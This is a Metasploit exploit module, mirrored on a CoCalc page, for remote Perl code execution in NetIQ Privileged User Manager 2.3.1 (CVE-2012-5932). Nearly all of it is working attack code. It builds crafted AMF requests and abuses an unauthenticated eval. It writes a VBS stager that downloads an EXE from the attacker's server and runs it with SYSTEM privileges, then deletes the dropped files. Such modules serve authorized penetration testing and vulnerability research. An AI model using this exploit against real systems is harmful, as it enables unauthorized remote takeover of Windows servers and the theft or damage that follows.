CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/novell/netiq_pum_eval.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer9include Msf::Exploit::Remote::HttpClient10include Msf::Exploit::EXE11include Msf::Exploit::FileDropper1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution',18'Description' => %q{19This module abuses a lack of authorization in the NetIQ Privileged User Manager20service (unifid.exe) to execute arbitrary perl code. The problem exists in the21ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over22Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.23},24'Author' => [25'rgod', # Vulnerability discovery and PoC26'juan vazquez' # Metasploit module27],28'License' => MSF_LICENSE,29'References' => [30[ 'CVE', '2012-5932' ],31[ 'OSVDB', '87334' ],32[ 'BID', '56539' ],33[ 'EDB', '22738' ]34],35'Payload' => {36'Space' => 2048,37'StackAdjustment' => -350038},39'Platform' => 'win',40'Privileged' => true,41'Targets' => [42['Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1', {}],43],44'DefaultTarget' => 0,45'DisclosureDate' => '2012-11-15',46'Compat' => {47'Meterpreter' => {48'Commands' => %w[49stdapi_fs_delete_file50stdapi_sys_config_getenv51]52}53}54)55)5657register_options(58[59Opt::RPORT(443),60OptBool.new('SSL', [true, 'Use SSL', true]),61OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60])62]63)6465self.needs_cleanup = true66end6768def check69data = fake_login7071print_status("Sending fake login request...")7273res = send_request_cgi(74{75'uri' => '/',76'version' => '1.1',77'method' => 'POST',78'ctype' => "application/x-amf",79'headers' => {80"x-flash-version" => "11,4,402,278"81},82'data' => data,83}84)8586if res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/ and res.body =~ /2\.3\.1/87return Exploit::CheckCode::Appears88elsif res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/89return Exploit::CheckCode::Detected90end9192return Exploit::CheckCode::Safe93end9495def on_new_session(session)96if session.type == "meterpreter"97session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")98end99100@dropped_files.delete_if do |file|101win_file = file.gsub("/", "\\\\")102if session.type == "meterpreter"103begin104windir = session.sys.config.getenv('WINDIR')105win_file = "#{windir}\\system32\\#{win_file}"106# Meterpreter should do this automatically as part of107# fs.file.rm(). Until that has been implemented, remove the108# read-only flag with a command.109session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)110session.fs.file.rm(win_file)111print_good("Deleted #{file}")112true113rescue ::Rex::Post::Meterpreter::RequestError114false115end116117end118end119end120121# Handle incoming requests from the target122def on_request_uri(cli, request)123vprint_status("on_request_uri called")124125if (not @exe_data)126print_error("A request came in, but the EXE archive wasn't ready yet!")127return128end129130print_good("Sending the EXE payload to the target...")131send_response(cli, @exe_data)132@exe_sent = true133end134135def lookup_lhost()136# Get the source address137if datastore['SRVHOST'] == '0.0.0.0'138Rex::Socket.source_address('50.50.50.50')139else140datastore['SRVHOST']141end142end143144def fake_login145data = "\x00\x00\x00\x00\x00\x01\x00\x15\x53\x50\x46\x2e\x55\x74" # ..........SPF.Ut146data << "\x69\x6c\x2e\x63\x61\x6c\x6c\x4d\x6f\x64\x75\x6c\x65\x45\x78\x00" # il.callModuleEx.147data << "\x02\x2f\x34\x00\x00\x00\x64\x0a\x00\x00\x00\x01\x03\x00\x03\x70" # ./4...d........p148data << "\x6b\x74\x03\x00\x0b\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73" # kt...Credentials149data << "\x03\x00\x04\x6e\x61\x6d\x65\x02\x00\x04\x74\x65\x73\x74\x00\x06" # ...name...test..150data << "\x70\x61\x73\x73\x77\x64\x02\x00\x04\x74\x65\x73\x74\x00\x00\x09" # passwd...test...151data << "\x00\x06\x6d\x65\x74\x68\x6f\x64\x02\x00\x05\x6c\x6f\x67\x69\x6e" # ..method...login152data << "\x00\x06\x6d\x6f\x64\x75\x6c\x65\x02\x00\x04\x61\x75\x74\x68\x00" # ..module...auth.153data << "\x03\x75\x69\x64\x06\x00\x00\x09\x00\x00\x09"; # .uid.......154return data155end156157def exploit158data = fake_login159160print_status("Sending fake login request...")161res = send_request_cgi(162{163'uri' => '/',164'version' => '1.1',165'method' => 'POST',166'ctype' => "application/x-amf",167'headers' => {168"x-flash-version" => "11,4,402,278"169},170'data' => data,171}172)173174if not res or res.code != 200 or res.body !~ /svc(.+)/175fail_with(Failure::Unknown, 'Fake Login failed, svc not identified')176end177178svc = $1179svc_length = svc[1, 2].unpack("n")[0]180svc_name = svc[3, svc_length]181vprint_status("SVC Found: #{svc_name}")182183print_status("Generating the EXE Payload...")184@exe_data = generate_payload_exe185exename = Rex::Text.rand_text_alpha(1 + rand(2))186187print_status("Setting up the Web Service...")188datastore['SSL'] = false189resource_uri = '/' + exename + '.exe'190service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}"191print_status("Starting up our web service on #{service_url} ...")192start_service({193'Uri' => {194'Proc' => Proc.new { |cli, req|195on_request_uri(cli, req)196},197'Path' => resource_uri198}199})200datastore['SSL'] = true201202# http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/203vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))204code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"205code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"206code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"207code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");"208code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"209code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");"210code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");"211code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"212code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");"213code << "system(\"#{vbs_stage}.vbs\");"214register_file_for_cleanup("#{vbs_stage}.vbs")215register_file_for_cleanup("#{exename}.exe")216identity = ""217218data = "\x00\x00\x00\x00\x00\x01"219data << "\x00\x14"220data << "SPF.Util.callModuleA"221data << "\x00\x00"222data << "\x00"223data << "\x00\x02"224data << "\x0a\x0a"225data << "\x00\x00\x00\x01\x03"226data << "\x00\x03"227data << "pkt"228data << "\x03"229data << "\x00\x06"230data << "method"231data << "\x02"232data << "\x00\x04"233data << "eval"234data << "\x00\x06"235data << "module"236data << "\x02"237data << "\x00\x08"238data << "ldapagnt"239data << "\x00\x04"240data << "Eval"241data << "\x03"242data << "\x00\x07"243data << "content"244data << "\x02"245data << [code.length + 4].pack("n")246data << code247data << "\x0a\x0a1;\x0a\x0a1;"248data << "\x00\x00\x09"249data << "\x00\x00\x09"250data << "\x00\x03"251data << "uid"252data << "\x02"253data << [identity.length].pack("n")254data << identity255data << "\x00\x00\x09"256data << "\x00\x08"257data << "svc_name"258data << "\x02"259data << [svc_name.length].pack("n")260data << svc_name261data << "\x00\x00\x09"262263print_status("Sending the eval code request...")264265res = send_request_cgi(266{267'uri' => '/',268'version' => '1.1',269'method' => 'POST',270'ctype' => "application/x-amf",271'headers' => {272"x-flash-version" => "11,4,402,278"273},274'data' => data,275}276)277278if res279fail_with(Failure::Unknown, "There was an unexpected response to the code eval request")280else281print_good("There wasn't a response, but this is the expected behavior...")282end283284# wait for the data to be sent285print_status("Waiting for the victim to request the EXE payload...")286287waited = 0288while (not @exe_sent)289select(nil, nil, nil, 1)290waited += 1291if (waited > datastore['HTTP_DELAY'])292fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")293end294end295296print_status("Giving time to the payload to execute...")297select(nil, nil, nil, 20)298end299end300301302